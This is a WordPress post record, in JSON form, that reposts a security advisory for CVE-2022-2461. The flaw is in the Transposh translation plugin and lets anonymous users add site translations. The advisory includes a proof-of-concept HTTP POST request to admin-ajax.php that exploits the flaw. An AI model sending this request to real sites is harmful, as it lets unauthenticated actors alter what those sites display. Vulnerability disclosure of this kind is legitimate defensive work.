{"id":28580,"date":"2022-07-29T20:41:35","date_gmt":"2022-07-29T16:41:35","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167870\/wptransposh107-auth.txt"},"modified":"2022-07-30T09:54:31","modified_gmt":"2022-07-30T05:24:31","slug":"transposh-wordpress-translation-1-0-7-incorrect-authorization","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/transposh-wordpress-translation-1-0-7-incorrect-authorization\/","title":{"rendered":"Transposh WordPress Translation 1.0.7 Incorrect Authorization"},"content":{"rendered":"<p dir=\"ltr\">RCE Security Advisory<br \/>\nhttps:\/\/www.rcesecurity.com<\/p>\n<p dir=\"ltr\">1. ADVISORY INFORMATION<br \/>\n=======================<br \/>\nProduct: Transposh WordPress Translation<br \/>\nVendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/<br \/>\nType: Incorrect Authorization [CWE-863]\nDate found: 2022-07-13<br \/>\nDate published: 2022-07-22<br \/>\nCVSSv3 Score: 7.5 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N)<br \/>\nCVE: CVE-2022-2461<\/p>\n<p dir=\"ltr\">2. CREDITS<br \/>\n==========<br \/>\nThis vulnerability was discovered and researched by Julien Ahrens from<br \/>\nRCE Security.<\/p>\n<p dir=\"ltr\">3. VERSIONS AFFECTED<br \/>\n====================<br \/>\nTransposh WordPress Translation 1.0.8.1 and below<\/p>\n<p dir=\"ltr\">4. INTRODUCTION<br \/>\n===============<br \/>\nTransposh translation filter for WordPress offers a unique approach to blog<br \/>\ntranslation. It allows your blog to combine automatic translation with human<br \/>\ntranslation aided by your users with an easy to use in-context interface.<\/p>\n<p dir=\"ltr\">(from the vendor&#8217;s homepage)<\/p>\n<p dir=\"ltr\">5. VULNERABILITY DETAILS<br \/>\n========================<br \/>\nWhen installed Transposh comes with a set of pre-configured options, one of these<br \/>\nis the &#8220;Who can translate&#8221; setting under the &#8220;Settings&#8221; tab, which by default<br \/>\nallows &#8220;Anonymous&#8221; users to add translations via the plugin&#8217;s &#8220;tp_translation&#8221;<br \/>\najax action.<\/p>\n<p dir=\"ltr\">Successful exploits can allow an unauthenticated attacker to add translations to<br \/>\nthe WordPress site and thereby influence what is actually shown on the site.<\/p>\n<p dir=\"ltr\">6. PROOF OF CONCEPT<br \/>\n===================<br \/>\nThe following Proof-of-Concept adds a new translation<\/p>\n<p dir=\"ltr\">POST \/wp-admin\/admin-ajax.php HTTP\/2<br \/>\nHost: [host]\nContent-Length: 75<br \/>\nCache-Control: max-age=0<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nUser-Agent: Mozilla\/5.0<\/p>\n<p dir=\"ltr\">action=tp_translation&amp;ln0=en&amp;sr0=rcesecurity.com&amp;items=1&amp;tk0=rcesecurity.com&amp;tr0=rcesecurity.com<\/p>\n<p dir=\"ltr\">7. SOLUTION<br \/>\n===========<br \/>\nNone. Remove the plugin to prevent exploitation.<\/p>\n<p dir=\"ltr\">8. REPORT TIMELINE<br \/>\n==================<br \/>\n2022-07-13: Discovery of the vulnerability<br \/>\n2022-07-13: CVE requested from WPScan (CNA)<br \/>\n2022-07-18: No response from WPScan<br \/>\n2022-07-18: CVE requested from Wordfence (CNA) instead<br \/>\n2022-07-18: Sent note to vendor<br \/>\n2022-07-18: Wordfence assigns CVE-2022-2461<br \/>\n2022-07-20: Since there are currently no plans to provide fixes at all:<br \/>\n2022-07-22: Public disclosure<\/p>\n<p dir=\"ltr\">9. REFERENCES<br \/>\n=============<br \/>\nhttps:\/\/github.com\/MrTuxracer\/advisories<br \/>\nhttps:\/\/www.rcesecurity.com\/2022\/07\/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p>RCE Security Advisory https:\/\/www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/ Type: Incorrect Authorization [CWE-863] Date found: 2022-07-13 Date published: 2022-07-22 CVSSv3 Score: 7.5 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N) CVE: CVE-2022-2461 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28580","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28580"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28580\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}